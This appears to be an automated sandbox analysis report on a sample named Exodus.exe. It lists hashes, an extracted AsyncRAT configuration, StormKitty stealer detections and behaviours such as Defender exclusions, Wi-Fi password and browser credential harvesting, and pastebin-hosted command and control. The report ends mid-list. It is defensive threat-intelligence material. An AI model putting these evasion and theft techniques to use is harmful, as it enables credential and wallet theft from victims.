Analysis
-
max time kernel
29s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
14-02-2025 19:13
Static task
static1
Behavioral task
behavioral1
Sample
Exodus.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Exodus.exe
Resource
win10v2004-20250207-en
General
-
Target
Exodus.exe
-
Size
6.5MB
-
MD5
6e791decc1503a7887a424385a7de5f9
-
SHA1
16774590108d269188bbffdd39eaab403d0ec456
-
SHA256
d7d8df8804b9b0bb194430adfbbca2d0559807720b7139f5cf62ef8aaebe8619
-
SHA512
c7d8ea085d1d136902fdbccdf5e2c6f7aa4ecb3bc01b55077a1ba047c197a8ecd1281881897afc53fe464ef54d747c6e92e5bd2c7e6a3c3a00d59c5c6ea5d97b
-
SSDEEP
196608:2tkkK2LCXgdJ1D5HMIPFmbp1b62HQw7V97UKrVygmx:2xmQZjypbpp2aEVx
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023e0e-50.dat family_stormkitty behavioral2/memory/2468-76-0x0000000000A00000-0x0000000000A32000-memory.dmp family_stormkitty -
Stormkitty family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023e0e-50.dat family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1848 powershell.exe 4960 powershell.exe 1548 powershell.exe 4368 powershell.exe 1592 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 17 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Exodus.exe Key value queried \REGISTRY\USER\S-1-5-21-189444705-1272902858-1305688695-1000\Control Panel\International\Geo\Nation Dll-protected.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4700 cmd.exe 3288 powershell.exe -
Executes dropped EXE 33 IoCs
pid Process 2040 Dll-protected.exe 1756 Dll-protected.exe 4376 Built.exe 2468 Server.exe 808 Built.exe 4768 Dll-protected.exe 1296 Built.exe 1620 Server.exe 1412 Built.exe 1968 Dll-protected.exe 1132 Built.exe 924 Server.exe 1796 Built.exe 5228 Dll-protected.exe 5272 Built.exe 5324 Server.exe 5424 Built.exe 3808 Dll-protected.exe 2480 Built.exe 512 Server.exe 5380 Built.exe 4504 Built.exe 5368 Dll-protected.exe 3068 Server.exe 2056 Built.exe 3200 Dll-protected.exe 5880 Built.exe 5892 Server.exe 5944 Built.exe 4156 Built.exe 5304 Server.exe 5496 Dll-protected.exe 4104 Built.exe -
Loads dropped DLL 64 IoCs
pid Process 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 808 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1412 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 1796 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5424 Built.exe 5380 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops desktop.ini file(s) 35 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\baf64ae7d99a94a20c164aea5ec229f3\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\baf64ae7d99a94a20c164aea5ec229f3\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\510226f77dcd70d2122568bd9dec75b1\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini Server.exe File opened for modification C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini Server.exe File opened for modification C:\Users\Admin\AppData\Local\510226f77dcd70d2122568bd9dec75b1\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\510226f77dcd70d2122568bd9dec75b1\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini Server.exe File opened for modification C:\Users\Admin\AppData\Local\baf64ae7d99a94a20c164aea5ec229f3\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\7d9dc21309e7ab66a486059a2abeb6b2\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\510226f77dcd70d2122568bd9dec75b1\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\baf64ae7d99a94a20c164aea5ec229f3\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\7d9dc21309e7ab66a486059a2abeb6b2\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\7d9dc21309e7ab66a486059a2abeb6b2\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\510226f77dcd70d2122568bd9dec75b1\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\510226f77dcd70d2122568bd9dec75b1\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\7d9dc21309e7ab66a486059a2abeb6b2\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\510226f77dcd70d2122568bd9dec75b1\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\baf64ae7d99a94a20c164aea5ec229f3\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File opened for modification C:\Users\Admin\AppData\Local\7d9dc21309e7ab66a486059a2abeb6b2\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\7d9dc21309e7ab66a486059a2abeb6b2\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\119f087d28779f9d112f9ab806cdaa82\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\baf64ae7d99a94a20c164aea5ec229f3\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\baf64ae7d99a94a20c164aea5ec229f3\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini Server.exe File created C:\Users\Admin\AppData\Local\7d9dc21309e7ab66a486059a2abeb6b2\Admin@JMMHYVAZ_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini Server.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 19 IoCs
flow ioc 150 pastebin.com 99 pastebin.com 122 pastebin.com 149 pastebin.com 146 pastebin.com 179 pastebin.com 185 pastebin.com 36 pastebin.com 37 pastebin.com 118 pastebin.com 196 pastebin.com 77 pastebin.com 80 pastebin.com 152 pastebin.com 175 pastebin.com 187 pastebin.com 78 pastebin.com 151 pastebin.com 168 pastebin.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 icanhazip.com 52 icanhazip.com 160 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 2708 tasklist.exe 2184 tasklist.exe 956 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023e1e-71.dat upx behavioral2/memory/808-75-0x00007FFD01860000-0x00007FFD01CC6000-memory.dmp upx behavioral2/files/0x0007000000023e12-78.dat upx behavioral2/files/0x0007000000023e1c-81.dat upx behavioral2/files/0x0007000000023e11-100.dat upx behavioral2/memory/808-103-0x00007FFD14E20000-0x00007FFD14E4C000-memory.dmp upx behavioral2/memory/1412-134-0x00007FFD013F0000-0x00007FFD01856000-memory.dmp upx behavioral2/files/0x0007000000023e2c-151.dat upx behavioral2/memory/1412-156-0x00007FFD18C00000-0x00007FFD18C18000-memory.dmp upx behavioral2/memory/1412-157-0x00007FFD149C0000-0x00007FFD149EC000-memory.dmp upx behavioral2/memory/1412-155-0x00007FFD19010000-0x00007FFD1901F000-memory.dmp upx behavioral2/memory/1412-154-0x00007FFD14DF0000-0x00007FFD14E14000-memory.dmp upx behavioral2/files/0x0007000000023e2e-153.dat upx behavioral2/files/0x0007000000023e2d-152.dat upx behavioral2/files/0x0007000000023e2b-150.dat upx behavioral2/files/0x0007000000023e2a-149.dat upx behavioral2/files/0x0007000000023e3b-147.dat upx behavioral2/files/0x0007000000023e3a-146.dat upx behavioral2/memory/808-165-0x00007FFD14F60000-0x00007FFD14F84000-memory.dmp upx behavioral2/memory/808-164-0x00007FFD03480000-0x00007FFD035FA000-memory.dmp upx behavioral2/memory/808-163-0x00007FFD14F40000-0x00007FFD14F5F000-memory.dmp upx behavioral2/memory/808-166-0x00007FFD14DD0000-0x00007FFD14DE9000-memory.dmp upx behavioral2/memory/808-168-0x00007FFD12000000-0x00007FFD1202E000-memory.dmp upx behavioral2/memory/1412-169-0x00007FFD013F0000-0x00007FFD01856000-memory.dmp upx behavioral2/memory/808-177-0x00007FFD14420000-0x00007FFD14435000-memory.dmp upx behavioral2/memory/808-176-0x00007FFD02F20000-0x00007FFD03038000-memory.dmp upx behavioral2/memory/808-175-0x00007FFD15500000-0x00007FFD1550D000-memory.dmp upx behavioral2/memory/808-172-0x00007FFD03040000-0x00007FFD033B9000-memory.dmp upx behavioral2/memory/808-170-0x00007FFD033C0000-0x00007FFD03478000-memory.dmp upx behavioral2/memory/808-167-0x00007FFD15620000-0x00007FFD1562D000-memory.dmp upx behavioral2/memory/808-162-0x00007FFD01860000-0x00007FFD01CC6000-memory.dmp upx behavioral2/files/0x0007000000023e38-144.dat upx behavioral2/files/0x0007000000023e34-141.dat upx behavioral2/files/0x0007000000023e32-140.dat upx behavioral2/memory/808-102-0x00007FFD19030000-0x00007FFD19048000-memory.dmp upx behavioral2/files/0x0007000000023e19-99.dat upx behavioral2/files/0x0007000000023e18-98.dat upx behavioral2/memory/1412-183-0x00007FFD01E40000-0x00007FFD01FBA000-memory.dmp upx behavioral2/memory/808-191-0x00007FFD03480000-0x00007FFD035FA000-memory.dmp upx behavioral2/memory/1412-190-0x00007FFD005F0000-0x00007FFD00969000-memory.dmp upx behavioral2/memory/1412-193-0x00007FFD0C1F0000-0x00007FFD0C205000-memory.dmp upx behavioral2/memory/1412-206-0x00007FFD005F0000-0x00007FFD00969000-memory.dmp upx behavioral2/memory/1412-213-0x00007FFD013F0000-0x00007FFD01856000-memory.dmp upx behavioral2/memory/1412-212-0x00007FFD149C0000-0x00007FFD149EC000-memory.dmp upx behavioral2/memory/1412-211-0x00007FFD18C00000-0x00007FFD18C18000-memory.dmp upx behavioral2/memory/1412-210-0x00007FFD19010000-0x00007FFD1901F000-memory.dmp upx behavioral2/memory/1412-209-0x00007FFD14DF0000-0x00007FFD14E14000-memory.dmp upx behavioral2/memory/1412-207-0x00007FFD0C1F0000-0x00007FFD0C205000-memory.dmp upx behavioral2/memory/1412-205-0x00007FFD01D80000-0x00007FFD01E38000-memory.dmp upx behavioral2/memory/1412-204-0x00007FFD0C210000-0x00007FFD0C23E000-memory.dmp upx behavioral2/memory/1412-201-0x00007FFD01E40000-0x00007FFD01FBA000-memory.dmp upx behavioral2/memory/1412-200-0x00007FFD10540000-0x00007FFD1055F000-memory.dmp upx behavioral2/memory/1412-194-0x00007FFD14980000-0x00007FFD1498D000-memory.dmp upx behavioral2/memory/1412-203-0x00007FFD149B0000-0x00007FFD149BD000-memory.dmp upx behavioral2/memory/1412-202-0x00007FFD0C240000-0x00007FFD0C259000-memory.dmp upx behavioral2/memory/808-192-0x00007FFD14DD0000-0x00007FFD14DE9000-memory.dmp upx behavioral2/memory/1412-188-0x00007FFD01D80000-0x00007FFD01E38000-memory.dmp upx behavioral2/memory/1412-187-0x00007FFD0C210000-0x00007FFD0C23E000-memory.dmp upx behavioral2/memory/1412-186-0x00007FFD149B0000-0x00007FFD149BD000-memory.dmp upx behavioral2/memory/1412-185-0x00007FFD0C240000-0x00007FFD0C259000-memory.dmp upx behavioral2/memory/808-184-0x00007FFD14F40000-0x00007FFD14F5F000-memory.dmp upx behavioral2/memory/1412-182-0x00007FFD10540000-0x00007FFD1055F000-memory.dmp upx behavioral2/memory/808-83-0x00007FFD1B2C0000-0x00007FFD1B2CF000-memory.dmp upx behavioral2/memory/808-82-0x00007FFD14F60000-0x00007FFD14F84000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Server.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3112 MicrosoftEdgeUpdate.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 64 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5196 cmd.exe 4452 cmd.exe 6216 netsh.exe 6096 cmd.exe 4332 cmd.exe 4940 cmd.exe 5664 cmd.exe 5080 cmd.exe 1388 netsh.exe 2180 netsh.exe 2536 netsh.exe 4340 netsh.exe 5160 netsh.exe 2876 netsh.exe 1124 netsh.exe 4888 netsh.exe 5496 netsh.exe 456 cmd.exe 6832 cmd.exe 7164 netsh.exe 6632 cmd.exe 6748 cmd.exe 5576 cmd.exe 5556 netsh.exe 6864 cmd.exe 2076 cmd.exe 5608 netsh.exe 4732 netsh.exe 4372 netsh.exe 5384 cmd.exe 3292 netsh.exe 6228 cmd.exe 5772 cmd.exe 5956 cmd.exe 6124 netsh.exe 5260 netsh.exe 6408 netsh.exe 3552 netsh.exe 4120 cmd.exe 2688 cmd.exe 6844 cmd.exe 6992 cmd.exe 3172 cmd.exe 5912 netsh.exe 3696 cmd.exe 4332 netsh.exe 6640 netsh.exe 2480 netsh.exe 3064 cmd.exe 2012 netsh.exe 6676 netsh.exe 5984 netsh.exe 4372 cmd.exe 6548 netsh.exe 6812 cmd.exe 6872 cmd.exe 4940 cmd.exe 7024 netsh.exe 5424 cmd.exe 5160 netsh.exe 456 cmd.exe 5716 cmd.exe 3316 netsh.exe 5700 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Server.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Server.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5564 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1244 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 63 IoCs
pid Process 1848 powershell.exe 1848 powershell.exe 4960 powershell.exe 4960 powershell.exe 1548 powershell.exe 1548 powershell.exe 1848 powershell.exe 1848 powershell.exe 4960 powershell.exe 4960 powershell.exe 1548 powershell.exe 1548 powershell.exe 3288 powershell.exe 3288 powershell.exe 5096 powershell.exe 5096 powershell.exe 3288 powershell.exe 5096 powershell.exe 2468 Server.exe 2468 Server.exe 2468 Server.exe 1620 Server.exe 1620 Server.exe 1620 Server.exe 924 Server.exe 924 Server.exe 924 Server.exe 1620 Server.exe 1620 Server.exe 924 Server.exe 924 Server.exe 924 Server.exe 924 Server.exe 1620 Server.exe 1620 Server.exe 5324 Server.exe 5324 Server.exe 5324 Server.exe 1620 Server.exe 1620 Server.exe 5324 Server.exe 5324 Server.exe 1620 Server.exe 1620 Server.exe 512 Server.exe 512 Server.exe 512 Server.exe 5324 Server.exe 5324 Server.exe 924 Server.exe 924 Server.exe 1620 Server.exe 1620 Server.exe 5324 Server.exe 5324 Server.exe 924 Server.exe 924 Server.exe 1620 Server.exe 1620 Server.exe 924 Server.exe 924 Server.exe 512 Server.exe 512 Server.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeDebugPrivilege 2468 Server.exe Token: SeDebugPrivilege 1620 Server.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeDebugPrivilege 924 Server.exe Token: SeDebugPrivilege 2184 tasklist.exe Token: SeDebugPrivilege 2708 tasklist.exe Token: SeIncreaseQuotaPrivilege 1892 WMIC.exe Token: SeSecurityPrivilege 1892 WMIC.exe Token: SeTakeOwnershipPrivilege 1892 WMIC.exe Token: SeLoadDriverPrivilege 1892 WMIC.exe Token: SeSystemProfilePrivilege 1892 WMIC.exe Token: SeSystemtimePrivilege 1892 WMIC.exe Token: SeProfSingleProcessPrivilege 1892 WMIC.exe Token: SeIncBasePriorityPrivilege 1892 WMIC.exe Token: SeCreatePagefilePrivilege 1892 WMIC.exe Token: SeBackupPrivilege 1892 WMIC.exe Token: SeRestorePrivilege 1892 WMIC.exe Token: SeShutdownPrivilege 1892 WMIC.exe Token: SeDebugPrivilege 1892 WMIC.exe Token: SeSystemEnvironmentPrivilege 1892 WMIC.exe Token: SeRemoteShutdownPrivilege 1892 WMIC.exe Token: SeUndockPrivilege 1892 WMIC.exe Token: SeManageVolumePrivilege 1892 WMIC.exe Token: 33 1892 WMIC.exe Token: 34 1892 WMIC.exe Token: 35 1892 WMIC.exe Token: 36 1892 WMIC.exe Token: SeDebugPrivilege 956 tasklist.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeIncreaseQuotaPrivilege 1892 WMIC.exe Token: SeSecurityPrivilege 1892 WMIC.exe Token: SeTakeOwnershipPrivilege 1892 WMIC.exe Token: SeLoadDriverPrivilege 1892 WMIC.exe Token: SeSystemProfilePrivilege 1892 WMIC.exe Token: SeSystemtimePrivilege 1892 WMIC.exe Token: SeProfSingleProcessPrivilege 1892 WMIC.exe Token: SeIncBasePriorityPrivilege 1892 WMIC.exe Token: SeCreatePagefilePrivilege 1892 WMIC.exe Token: SeBackupPrivilege 1892 WMIC.exe Token: SeRestorePrivilege 1892 WMIC.exe Token: SeShutdownPrivilege 1892 WMIC.exe Token: SeDebugPrivilege 1892 WMIC.exe Token: SeSystemEnvironmentPrivilege 1892 WMIC.exe Token: SeRemoteShutdownPrivilege 1892 WMIC.exe Token: SeUndockPrivilege 1892 WMIC.exe Token: SeManageVolumePrivilege 1892 WMIC.exe Token: 33 1892 WMIC.exe Token: 34 1892 WMIC.exe Token: 35 1892 WMIC.exe Token: 36 1892 WMIC.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeDebugPrivilege 5324 Server.exe Token: SeDebugPrivilege 512 Server.exe Token: SeDebugPrivilege 3068 Server.exe Token: SeDebugPrivilege 5892 Server.exe Token: SeDebugPrivilege 5304 Server.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 468 wrote to memory of 2040 468 Exodus.exe 89 PID 468 wrote to memory of 2040 468 Exodus.exe 89 PID 468 wrote to memory of 3616 468 Exodus.exe 90 PID 468 wrote to memory of 3616 468 Exodus.exe 90 PID 3616 wrote to memory of 1756 3616 Exodus.exe 91 PID 3616 wrote to memory of 1756 3616 Exodus.exe 91 PID 3616 wrote to memory of 2664 3616 Exodus.exe 92 PID 3616 wrote to memory of 2664 3616 Exodus.exe 92 PID 2040 wrote to memory of 4376 2040 Dll-protected.exe 93 PID 2040 wrote to memory of 4376 2040 Dll-protected.exe 93 PID 2040 wrote to memory of 2468 2040 Dll-protected.exe 94 PID 2040 wrote to memory of 2468 2040 Dll-protected.exe 94 PID 2040 wrote to memory of 2468 2040 Dll-protected.exe 94 PID 4376 wrote to memory of 808 4376 Built.exe 95 PID 4376 wrote to memory of 808 4376 Built.exe 95 PID 2664 wrote to memory of 4768 2664 Exodus.exe 96 PID 2664 wrote to memory of 4768 2664 Exodus.exe 96 PID 2664 wrote to memory of 4672 2664 Exodus.exe 97 PID 2664 wrote to memory of 4672 2664 Exodus.exe 97 PID 1756 wrote to memory of 1296 1756 Dll-protected.exe 98 PID 1756 wrote to memory of 1296 1756 Dll-protected.exe 98 PID 1756 wrote to memory of 1620 1756 Dll-protected.exe 99 PID 1756 wrote to memory of 1620 1756 Dll-protected.exe 99 PID 1756 wrote to memory of 1620 1756 Dll-protected.exe 99 PID 1296 wrote to memory of 1412 1296 Built.exe 100 PID 1296 wrote to memory of 1412 1296 Built.exe 100 PID 808 wrote to memory of 4100 808 Built.exe 101 PID 808 